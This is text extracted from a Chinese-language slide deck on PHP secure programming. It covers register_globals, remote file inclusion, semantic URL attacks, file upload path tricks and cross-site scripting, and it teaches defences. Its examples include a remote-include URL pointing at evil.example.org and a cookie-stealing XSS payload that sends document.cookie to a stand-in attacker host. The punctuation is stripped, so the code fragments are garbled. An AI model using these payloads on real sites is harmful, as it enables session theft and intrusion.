PHP安全编程.ppt

PHP安全编程 register globals 一把杀人不见血的刀使用未初始化的变量几乎就意味着安全漏洞 背景 很久很久以前 PHP程序员通过 registerglobals 全局变量注册 机制读取用户提供的数据 在这种情形下 所有提交给一个脚本的参数都以一个与参数同名的变量的形式出现 例如 URLscript php foo bar会创建一个值为bar的变量 foo 输出 bar 如何继续我们刀头舐血的生涯 必须要初始化所有变量并且把error reporting设为E ALL 或E ALL E STRICT 以对未初始化变量进行警告 当register globals开启时 任何使用未初始化变量的行为几乎就意味着安全漏洞 常量解决方案 远程包含漏洞 在这种情形下攻击者能操纵不只是文件名 还能控制所包含的资源 由于PHP默认不只可以包含文件 还可以包含下面的资源 由配置文件中的allow url fopen所控制 远程包含漏洞 http example org index php path http evil example org evil inc Evil inc内容 语义URL攻击 一个会员中心信息修改页 一个更隐蔽的例子 取回密码Pleasespecifytheemailaddresswhereyouwantyournewpasswordsent 解决之道 Session a z0 9 a z 2 i if preg match email pattern POST email clean email POST email user SESSION user new password md5 uniqid rand TRUE if SESSION verified UpdatePassword mail clean email YourNewPassword new password 文件上传攻击 FILES file Array name a php originalfilename type plain text mimetype tmp name tmp phpoud3hu temporarystoragelocation error 0 errorcode size 12933 uploadedfilesize 文件名输入漏洞 assuming FILES file name config php move uploaded file FILES file tmp name home www app dir FILES file name 产生原因 某些浏览器允许形如 config php的文件名提交 或者您可以直接构造该文件名进行提交同时 PHP4 3 10以下存在一个严重漏洞 对文件名中的 不作过滤 解决之道 assuming FILES file name config php move uploaded file FILES file tmp name home www app dir basename FILES file name 跨站脚本攻击 一个留言簿程序 提交表单 Name Comment PHP显示程序 namewrites echo comment 笨拙的攻击 document location http evil example org steal php cookies document c